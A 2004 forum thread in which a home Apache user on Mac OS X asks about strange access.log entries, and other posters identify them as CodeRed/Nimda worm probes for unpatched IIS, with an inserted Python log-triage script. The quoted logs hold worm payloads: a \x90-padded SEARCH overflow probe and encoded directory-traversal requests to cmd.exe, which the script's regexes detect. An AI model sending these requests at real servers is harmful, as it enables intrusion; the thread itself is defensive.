Stupid windoz hackers... an annoyance, but should I be worried about my server?

walkingmac
Apr 5, 2004, 04:06 AM
ok... so I take advantage of the fact that I have Apache ready to use on my nice Mac OS X PowerMac and host my own website.

I also like to know what is going on with my site and who is accessing what. So I have my access.log displayed on my desktop with *GeekTool*.

Every so often I get blips like this that also send my CPU screaming for a few minutes:
12.220.19.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\ ...and on and on a couple of thousand times... x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ ...like 10,000 more of these or so.... \x90\x90\x90" 414 363

Is this a flood or something else?

and I get these a lot:
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324

I look up the IP address and it says this is somewhere in Lexington KY.
Any help?
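The log lines quoted above are the two probe families the rest of the thread discusses: the long SEARCH request whose body is a run of escaped 0x90 bytes, and the cmd.exe/root.exe requests with double-encoded "../" traversal. As an added example that is not part of the original post or any poster's code, the following Python script parses Apache common-format lines, tags each request with which probe family it matches, and counts hits per source address so you can see at a glance who is noisy; it is written from the defender's side (log triage, not reproduction of the requests). The signature patterns are assumptions built only from the paths shown in the post, not a complete worm signature list, and the sample log is constructed with documentation addresses (192.0.2.x) rather than the real ones from the thread.

```python
import re
import sys
from collections import Counter, defaultdict

# Apache common log format, one request per line, e.g.
#   1.2.3.4 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
# The protocol field is optional because the SEARCH probe in the thread is logged without one.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>[^"\s]+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Assumed detection patterns, derived from the request paths quoted in the post.
IIS_PROBE_RE = re.compile(r'(?i)/(?:cmd|root)\.exe\?/c\+')          # cmd.exe?/c+dir, root.exe?/c+dir
DOUBLE_DECODE_RE = re.compile(r'(?i)%25|%c0%af|%c1%1c|%c1%9c|%c0%2f|%%35')  # encoded "../" variants
NOP_SLED_RE = re.compile(r'(?:\\x90){8,}')  # Apache writes unprintable bytes as literal "\x90"


def parse_line(line):
    """Return a dict of fields for one access.log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def classify(entry):
    """Tag a parsed request with a probe family, or None for ordinary traffic."""
    target = entry['target']
    if entry['method'].upper() == 'SEARCH' and NOP_SLED_RE.search(target):
        return 'webdav-overflow-probe'     # the long SEARCH request with a run of \x90
    if IIS_PROBE_RE.search(target):
        if DOUBLE_DECODE_RE.search(target):
            return 'iis-traversal-probe'   # encoded ../ walk to winnt/system32/cmd.exe
        return 'iis-backdoor-probe'        # direct hit on root.exe / cmd.exe
    return None


def scan(lines):
    """Count probe families per source IP; benign lines are ignored."""
    per_ip = defaultdict(Counter)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind:
            per_ip[entry['ip']][kind] += 1
    return per_ip


def noisy_ips(per_ip, threshold=3):
    """Sources whose total probe count reaches the threshold, sorted for stable output."""
    return sorted(ip for ip, counts in per_ip.items() if sum(counts.values()) >= threshold)


# Constructed sample log (documentation addresses); the \x90 run is shortened from the original.
SAMPLE_LOG = r"""
192.0.2.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 363
192.0.2.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
192.0.2.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
192.0.2.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
192.0.2.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
192.0.2.50 - - [05/Apr/2004:09:00:01 -0400] "GET /index.html HTTP/1.1" 200 1234
"""


if __name__ == '__main__':
    # Reads access.log from stdin if piped, otherwise scans the constructed sample.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG.splitlines()
    results = scan(source)
    for ip, counts in sorted(results.items()):
        print(ip, dict(counts))
    print('noisy:', noisy_ips(results))
```

Run it as `python3 triage.py < /var/log/httpd/access_log` (path assumed; use wherever your Apache writes access.log). Every request in the sample got a 4xx, which is the point Westside guy makes below: these are blind probes for IIS, and an Apache box answering 404 is not affected by them. The per-IP counts are what you would hand to a firewall rule or to the ISP of the offending address if the volume ever became a problem.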



Westside guy
Apr 5, 2004, 04:22 AM
This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.

walkingmac
Apr 5, 2004, 04:28 AM
ok so the endless numbers that eat my CPU for a little bit are ALSO a M$ Webserver thing?

tomf87
Apr 5, 2004, 08:42 AM
This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.

Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.

Jeewhizz
Apr 5, 2004, 08:46 AM
You can stop it being logged in your apache log if it's bothering you...

More details here: http://forums.ev1servers.net/showthread.php?s=&threadid=3918&highlight=code+AND+red+AND+apache

Jee

7on
Apr 5, 2004, 10:48 AM
Would turning on the firewall stop such attacks from affecting CPU speed?

tomf87
Apr 5, 2004, 11:42 AM
Would turning on the firewall stop such attacks from affecting CPU speed?

No because the firewall works on the port level (level 4) not level 5, so any port 80 request would be allowed through.

Jeewhizz
Apr 5, 2004, 12:34 PM
Depending on how you use it, you could just move apache to say port 81, close port 80 on the firewall, and then access apache via http://127.0.0.1:81/

Jee

walkingmac
Apr 5, 2004, 01:28 PM
It's not that it bothers me that it is logged (I like the fact that I can see what's going on at least) rather that it is affecting my system's performance. I don't see the value in moving my port. Is it just they are banging away at anything listening to 80 specifically or is it through my website (which of course is on port 80)? How will moving my port to 81 affect my website? Would this then require something different than my current system of updating my IP address to the DNS? (sorry I don't know a whole lot about this stuff besides turning on and setting up services and making the websites :o )

Jeewhizz
Apr 5, 2004, 01:53 PM
Well, I only use apache/mysql on my PC atm for local testing - and for showing clients their work... so it's only accessed from outside the network when I give out a link - so I give out http://MY_IPADDRESS:81/client/index.php

Moving to port 81 would stop most of it, as they will be scanning all IPs on port 80 - which would be blocked by your firewall.

However, if you use your mac as a server a lot, then moving to port 81 wouldn't be a good idea ;)

Westside guy
Apr 5, 2004, 02:58 PM
Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.

You're right; it's CodeRed. So it's a hacker once removed. :D

Would turning on the firewall stop such attacks from affecting CPU speed?

I wouldn't worry so much about the system impact; but unfortunately if there's enough traffic it can certainly bog down your internet connection. There's not a lot you personally can do about that; and if you ask your ISP to do something about it they'll probably say "you know, you're not supposed to be running any sort of server on our lines". :p

superbovine
Apr 6, 2004, 01:56 AM
google for how to make a host.deny file and add the ip to your host.deny file.